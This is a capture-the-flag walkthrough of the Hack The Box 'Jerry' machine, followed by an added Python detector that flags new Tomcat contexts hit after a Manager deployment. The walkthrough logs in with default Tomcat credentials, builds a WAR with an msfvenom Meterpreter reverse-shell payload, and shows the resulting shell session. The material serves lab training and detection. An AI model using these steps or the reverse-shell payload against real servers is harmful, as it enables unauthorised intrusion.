Hack The Box: Beginner Track - Jerry


This is the fourth part of the Hack The Box Beginner Track: “Jerry”.


Jerry


Enumeration

nmap reveals only one open port, which is Tomcat 7.0.88 on port 8080:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88



Initial Foothold

The box is tagged “Default Credentials”, so let’s see if this helps us here. The Tomcat login page opens at /manager/html. After entering a wrong password, we get a “403 - Access Denied” page that includes a sample configuration showing how to set up a manager user. It lists a username and password.


Now, if we log in again (you need to clear the cache or use a private window), we are in!



Privilege Escalation

Googling for “Tomcat 7.0.88 exploit”, we get a couple of hits regarding remote code execution via JSP upload. Let’s see if Metasploit has something prepared:


Unfortunately both exploit 7 and exploit 25 fail, so we might need to find a more manual approach.


Let’s create a WAR-file with msfvenom:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.74 -f war -o backupjob.war LPORT=4444

A WAR file is an archive that packages a Java web application together with its JAR files and other resources. We can check the contents with jar -ft backupjob.war:

$ jar -ft backupjob.war
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/
META-INF/MANIFEST.MF
WEB-INF/
WEB-INF/web.xml
maviljcffocdph.jsp

This means the file we actually need to get executed is maviljcffocdph.jsp. To do that, we simply request it (for example via curl or the browser), using the URL given in the applications list.


In parallel, of course, we need to have the listener ready in Metasploit (use multi/handler). Now we simply call the JSP file and get a shell.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.74:4444 
[*] Sending stage (175686 bytes) to 10.129.75.105
[*] Meterpreter session 1 opened (10.10.14.74:4444 -> 10.129.75.105:49192) at 2022-10-28 11:58:31 -0400

meterpreter > shell
Process 2872 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\apache-tomcat-7.0.88>
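
A defender-side complement to the deployment steps above, added here and not part of the original writeup: a small Python detector that baselines the context paths requested in Tomcat's access log and alerts when a brand-new context is first hit shortly after a successful Manager deployment. It assumes the default access-log pattern and treats HTTP 200/302 on the upload/deploy endpoints as a successful deploy; the log lines, the mgr_user name and the timings are constructed.

```python
import re
from datetime import datetime

# Default Tomcat access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Manager endpoints that deploy a new web application (HTML GUI upload, text API)
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample lines (not captured from the box): a normal request, a Manager
# login, a WAR upload by the Manager user, then the first request to the new context.
SAMPLE_LOG = [
    '10.129.75.105 - - [28/Oct/2022:11:55:02 -0400] "GET /docs/ HTTP/1.1" 200 19357',
    '10.10.14.74 - - [28/Oct/2022:11:56:10 -0400] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.74 - mgr_user [28/Oct/2022:11:56:40 -0400] "GET /manager/html HTTP/1.1" 200 14583',
    '10.10.14.74 - mgr_user [28/Oct/2022:11:57:55 -0400] "POST /manager/html/upload HTTP/1.1" 200 14991',
    '10.10.14.74 - - [28/Oct/2022:11:58:29 -0400] "GET /backupjob/maviljcffocdph.jsp HTTP/1.1" 200 -',
]

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect_manager_deploys(lines):
    """Alert on the first request to a context path that was never requested
    before a successful Manager deployment (baseline = contexts seen earlier)."""
    known, deploys, alerts = set(), [], []
    for rec in filter(None, map(parse_line, lines)):
        context = "/" + rec["path"].lstrip("/").split("/", 1)[0].split("?", 1)[0]
        if rec["path"].startswith(DEPLOY_PATHS):
            if rec["status"] in ("200", "302"):   # assumed success codes
                deploys.append((rec["time"], rec["host"], rec["user"]))
            continue
        if context == "/manager" or not deploys:
            known.add(context)                    # build the baseline
            continue
        if context not in known:
            known.add(context)
            t, _, user = deploys[-1]
            alerts.append({"context": context, "first_request": rec["path"],
                           "client": rec["host"], "deployed_by": user,
                           "seconds_after_deploy": (rec["time"] - t).total_seconds()})
    return alerts
```

Contexts requested before any deploy form the baseline, so a legitimate deployment of an application nobody has visited yet will also raise an alert; that is the intended trade-off for a low-volume Manager endpoint.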

In the desktop folder of the administrator user, we can find both flags.